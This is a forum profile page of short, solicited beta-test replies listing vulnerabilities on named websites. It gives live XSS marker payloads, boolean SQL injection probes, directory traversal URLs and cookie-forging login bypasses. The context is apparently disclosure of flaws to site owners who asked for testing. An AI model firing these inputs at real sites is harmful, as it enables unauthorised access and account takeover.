
agentsteal
Everything posted by agentsteal
-
Cross Site Scripting: There is Cross Site Scripting if you send a message that contains code.
Cross Site Scripting: There is Cross Site Scripting if your username contains code.
-
Admin Access: You can access the admin panel by changing the username cookie to admin.
Drop Down Menu: If you edit the Member Type drop down menu on http://www.gamerzworldonline.com/AuthPanel/pages/admin/index.php?action=addmember you can submit arbitrary values.
Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by setting the auth cookie to their username.
-
[SOLVED] new site i just put up
agentsteal replied to thewooleymammoth's topic in Beta Test Your Stuff!
Array: http://www.getyourlinkon.net/allmembers.php?search[]
Array: http://www.getyourlinkon.net/member.php?user[]
Array: http://www.getyourlinkon.net/viewrequest.php?title[]
Cross Site Scripting: http://www.getyourlinkon.net/member.php?user=../request/agentsteal
Cross Site Scripting: There is Cross Site Scripting if the auth cookie contains code.
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting on the Links page if the fields contain 'code.
Cross Site Scripting: There is Cross Site Scripting on the Request a Link page if the fields contain 'code.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain 'code.
Directory Traversal: http://www.getyourlinkon.net/member.php?user=../request/agentsteal
Directory Traversal: You can make txt files in any directory by registering with the username set to ../filename.
Directory Traversal: You can make txt files in any directory by requesting a link with the title set to ../filename.
Full Path Disclosure: http://www.getyourlinkon.net/test.php
Insecure Cookie: You shouldn't put the username in the cookie.
PHP Source Code Disclosure: http://www.getyourlinkon.net/ <?php echo "<html> <META HTTP-EQUIV='Refresh' CONTENT='5; URL=index.php'> </html>"; ?>
You can log in as any user by setting the auth cookie to their username.
You can make txt files in http://www.getyourlinkon.net/members/ by registering with the username set to the filename.
You can make txt files in http://www.getyourlinkon.net/request/ by requesting a link with the title set to the filename.
-
Cross Site Scripting: There is Cross Site Scripting on http://www.freelancebazar.com/contact.html if you submit code in the fields.
Drop Down Menu: If you edit the drop down menus on the Post Project page you can submit arbitrary values.
Full Path Disclosure: http://www.freelancebazar.com/includes/classes/controlpanel.class.php
Full Path Disclosure: http://www.freelancebazar.com/includes/classes/projects.class.php
Full Path Disclosure: http://www.freelancebazar.com/includes/classes/register.class.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/cp_escrow_provider_showproject.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/cp_projects_bids.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/project_all_category.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/projects_bid.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/projects_clarification_board.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/project_category.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/forms/user_comments.form.php
Full Path Disclosure: http://www.freelancebazar.com/includes/html/html.php
Includes Directory: http://www.freelancebazar.com/includes/
User Enumeration: http://www.freelancebazar.com/~freelan2
User Enumeration: http://www.freelancebazar.com/~root
-
ForumPix.co.uk - Host your pics here
agentsteal replied to phillips321's topic in Beta Test Your Stuff!
Full Path Disclosure: There is Full Path Disclosure when you upload an image.
Full Path Disclosure:
-
PHP forum with source code attached
agentsteal replied to Quicksilver_'s topic in Beta Test Your Stuff!
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
-
Array: http://www.games4uonline.com/mymail/create.php?subject[]
Array: http://www.games4uonline.com/mymail/create.php?username[]
Array: http://www.games4uonline.com/mysearch/search.php?q[]
Cross Site Scripting: http://www.games4uonline.com/mymail/index.php?message='><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.games4uonline.com/mymail/create.php?subject='><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.games4uonline.com/mymail/create.php?username='><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.games4uonline.com/mysearch/search.php?q="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.games4uonline.com/mymail/signup.php?message='><marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting if you submit code in a message.
Full Path Disclosure: http://www.games4uonline.com/mysearch/search.php?c[]
Full Path Disclosure: http://www.games4uonline.com/mysearch/search.php?i[]
-
Please test the beta version of my free arcade script
agentsteal replied to avillanu's topic in Beta Test Your Stuff!
Cross Site Scripting: http://www.crawfordresearch.com/arcade/search.php?term=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains code.
Drop Down Menu: If you edit the Rate drop down menu you can submit arbitrary values.
Full Path Disclosure: http://www.crawfordresearch.com/arcade/category.php
Full Path Disclosure: http://www.crawfordresearch.com/arcade/search.php?term[]
Null User: You can register a null username.
User Enumeration: http://www.crawfordresearch.com/~crawford
User Enumeration: http://www.crawfordresearch.com/~root
-
Cross Site Scripting: There is Cross Site Scripting if the loggedin cookie contains code.
Cross Site Scripting: There is Cross Site Scripting if your username contains code.
Database Dump: http://www.lamezz.com/_NEW/install/install/
Full Path Disclosure: http://www.lamezz.com/_NEW/_bin_/mailto.php
Full Path Disclosure: http://www.lamezz.com/_NEW/install/install/phpinfo.php
Includes Directory: http://www.lamezz.com/_NEW/_bin_/
Includes Directory: http://www.lamezz.com/_NEW/install/
SQL Error: http://www.lamezz.com/_NEW/install/forgotpass.php
SQL Error: http://www.lamezz.com/_NEW/install/install/install_new.php
SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_0-V1_2.php
SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_0-V1_3.php
SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_0-V1_4.php
SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_2-V1_3.php
SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_2-V1_4.php
SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_3-V1_4.php
SQL Error: http://www.lamezz.com/_NEW/install/login.php
SQL Error: http://www.lamezz.com/_NEW/install/register.php
User Enumeration: http://www.lamezz.com/~root
You can log in as any user by setting the loggedin cookie to their username.
-
Cross Site Scripting: There is Cross Site Scripting if your username contains code.
-
Cross Site Scripting: There is Cross Site Scripting if you submit </textarea>code in the fields.
-
Admin Access: Regular users can set admin privileges and make themselves admin.
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting if you submit code in the drop down menu on http://www.dennisbillings.com/calphalon/daysoff.php.
Cross Site Scripting: There is Cross Site Scripting on http://www.dennisbillings.com/addimages.php.
Cross Site Scripting: There is Cross Site Scripting on http://www.dennisbillings.com/allquotes.php.
Cross Site Scripting: There is Cross Site Scripting on http://www.dennisbillings.com/blog.php.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
Drop Down Menu: If you edit the drop down menu on http://www.dennisbillings.com/calphalon/daysoff.php you can submit arbitrary values.
Full Path Disclosure: http://www.dennisbillings.com/adminquoteeditor.php?id
Full Path Disclosure: http://www.dennisbillings.com/music.php?pmmsid[]
Full Path Disclosure: http://www.dennisbillings.com/projects.php?dl[]
Full Path Disclosure: There is Full Path Disclosure in the calendar.
Includes Directory: http://www.dennisbillings.com/login/
Null User: You can register a null username.
SQL Injection: http://www.dennisbillings.com/adminquoteeditor.php?id=1 AND 1=1 http://www.dennisbillings.com/adminquoteeditor.php?id=1 AND 1=2
User Enumeration: http://www.dennisbillings.com/~admin
User Enumeration: http://www.dennisbillings.com/~Devendea
User Enumeration: http://www.dennisbillings.com/~root
-
Cross Site Scripting: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.deanschs.co.uk/test.php?<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
Directory Traversal: http://www.deanschs.co.uk/controller.php?mode=../test.php
DOS: http://www.deanschs.co.uk/module/account/login.php/
Drop Down Menu: If you edit the drop down menus in the header you can submit arbitrary values.
Full Path Disclosure: http://www.deanschs.co.uk/controller.php
Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do[]
Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id[]
Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1&gid[]
Full Path Disclosure: http://www.deanschs.co.uk/controller.php?mode=../test.php
Full Path Disclosure: http://www.deanschs.co.uk/controller.php?mode[]
Full Path Disclosure:
SQL Error: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded
SQL Error: http://www.deanschs.co.uk/module/get/showindex.php
SQL Error: http://www.deanschs.co.uk/module/get/showindexsub.php
SQL Error: http://www.deanschs.co.uk/module/get/showpage.php
SQL Injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=2
SQL Injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=2
-
Array: http://www.freethepenguins.com/a[]
Array: http://www.freethepenguins.com/t=1&c[]
Drop Down Menu: If you edit the drop down menus on http://www.freethepenguins.com/fsearch=a you can submit arbitrary values.
Full Path Disclosure:
-
Array: http://multisearch.110mb.com/Grabs/grab.php?Video[]
Cross Site Scripting: http://multisearch.110mb.com/Admin/index.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://multisearch.110mb.com/Grabs/grab.php?Video="onmouseover=alert('vulnerable')
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting if you submit code in the Engine drop down menu.
Drop Down Menu: If you edit the Engine drop down menu you can submit arbitrary values.
-
Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
http://www.rawstar7.co.uk/site/comp/linux/security/tut_ssh.html
Includes Directory: http://www.rawstar7.co.uk/monkey/mods/
Includes Directory: http://www.rawstar7.co.uk/monkey/res/
User Enumeration: http://www.rawstar7.co.uk/~rawstar7/
-
Array: http://www.cmxva.com/index.php?page=flights&p[]
Array: http://www.cmxva.com/index.php?page[]
Array: http://www.cmxva.com/index.php?page=profile&call[]
Cross Site Scripting: http://www.cmxva.com/index.php?page=<marquee>vulnerable</marquee>
Cross Site Scripting: http://www.cmxva.com/index.php?page=flights&p="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.cmxva.com/index.php?page=profile&call=<marquee><h1>vulnerable</marquee>
Directory Traversal: http://www.cmxva.com/?page=../index
Full Path Disclosure: http://www.cmxva.com/?page=../../
Full Path Disclosure: http://www.cmxva.com/?page=../forums/index
Full Path Disclosure: http://www.cmxva.com/index.php?page=flights&s[]
Full Path Disclosure: http://www.cmxva.com/?page=FsPgetflight
Full Path Disclosure: http://www.cmxva.com/pages/account.php
Full Path Disclosure: http://www.cmxva.com/pages/aircraft.php
Full Path Disclosure: http://www.cmxva.com/pages/fleet.php
Full Path Disclosure: http://www.cmxva.com/pages/FsPgetflight.php
Full Path Disclosure: http://www.cmxva.com/pages/lost.php
Full Path Disclosure: http://www.cmxva.com/pages/loa.php
Full Path Disclosure: http://www.cmxva.com/pages/members.php
Full Path Disclosure: http://www.cmxva.com/pages/postflight.php
Full Path Disclosure: http://www.cmxva.com/pages/remove.php
Full Path Disclosure: http://www.cmxva.com/pages/training.php
Includes Directory: http://www.cmxva.com/pages/
Maximum Length: If you edit the input boxes when you register you can remove the maximum lengths.
SQL Error: http://www.cmxva.com/index.php?page=profile&call='
-
Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
Null User: You can register a null password.
Null User: You can register a null username.
-
Cross Site Scripting: https://lockbin.com/test.php?m=<marquee><h1>vulnerable</marquee>
Full Path Disclosure: https://lockbin.com/test.php?m[]
-
Array: http://www.sparkcash.net/inside/tracker.php?c[]
Array: http://www.sparkcash.net/inside/tracker.php?url[]
Array: http://www.sparkcash.net/signup.php?r[]
Cross Site Scripting: http://www.sparkcash.net/signup.php?r="><td><marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
Drop Down Menu: If you edit the drop down menu on http://www.sparkcash.net/inside/offers.php you can submit arbitrary values.
Insecure Cookie: You shouldn't put the password in the cookie.
Insecure Cookie: You shouldn't put the username in the cookie.
URL Inclusion: http://www.sparkcash.net/inside/tracker.php?url=http://www.google.com/
-
Cross Site Scripting: http://meisnermusic.awardspace.com/?a=n&s="><marquee><h1>vulnerable</marquee>
-
SQL Error: http://obb.awardspace.com/index.php?page=viewforum&row='
-
Cross Site Scripting: There is Cross Site Scripting if the Website contains "code.
Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.ocwars.com/v2/application/rapyd/.
Drop Down Menu: If you edit the Country Code drop down menu you can submit arbitrary values.
Includes Directory: http://www.ocwars.com/v2/application/rapyd/
-
New Site: Articles for your Ipod or Zune
agentsteal replied to zfred09's topic in Beta Test Your Stuff!
Cross Site Scripting: http://www.zidub.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains code.
Cross Site Scripting: There is Cross Site Scripting if you submit code in the drop down menu on the articles page.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
Drop Down Menu: If you edit the drop down menu on the articles page you can submit arbitrary values.
Full Path Disclosure: http://www.zidub.com/cgi-sys/scgiwrap/
User Enumeration: http://www.zidub.com/~root
User Enumeration: http://www.zidub.com/~zfred09
-
Some stuff to test for exploits/etc
agentsteal replied to speaker219's topic in Beta Test Your Stuff!
Admin Access: You can view and edit the site's source code through the Directory Traversal in the notes script.
Array: http://speaker219.ath.cx:8080/blog/index.php?waka[]
Array: http://speaker219.ath.cx:8080/blog/test.node?text[]
Array: http://speaker219.ath.cx:8080/Chat/history.php?log[]
Cross Site Scripting: http://speaker219.ath.cx:8080/blog/index.php?waka=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://speaker219.ath.cx:8080/blog/test.node?text=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting if you submit a note that contains </textarea>code.
Cross Site Scripting: There is Cross Site Scripting on http://speaker219.ath.cx:8080/URL-Encoder/test.php if the URL field contains code.
Directory Traversal: http://speaker219.ath.cx:8080/Chat/history.php?log=1/../../../vulnerable
Directory Traversal: http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php
Full Path Disclosure: http://speaker219.ath.cx:8080/Chat/preferences.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/ajax.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/announcement.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/calendar.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/cron.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/editpost.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/external.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/faq.php
Full Path Disclosure: http://speaker219.ath.cx:8080/forum/forumdisplay.php
Full Path Disclosure: http://speaker219.ath.cx:8080/Pics/lolcats/?id[]
Full Path Disclosure: http://speaker219.ath.cx:8080/scripts/test.php?txt[]
Full Path Disclosure: http://speaker219.ath.cx:8080/RSS-Reader.php?q=a
Full Path Disclosure: http://speaker219.ath.cx:8080/Chat/history.php?log=2'
Full Path Disclosure: http://speaker219.ath.cx:8080/Chat/cp/bans.php
Full Path Disclosure: http://speaker219.ath.cx:8080/notes/paste-edit.php
PHP Source Code Disclosure: http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php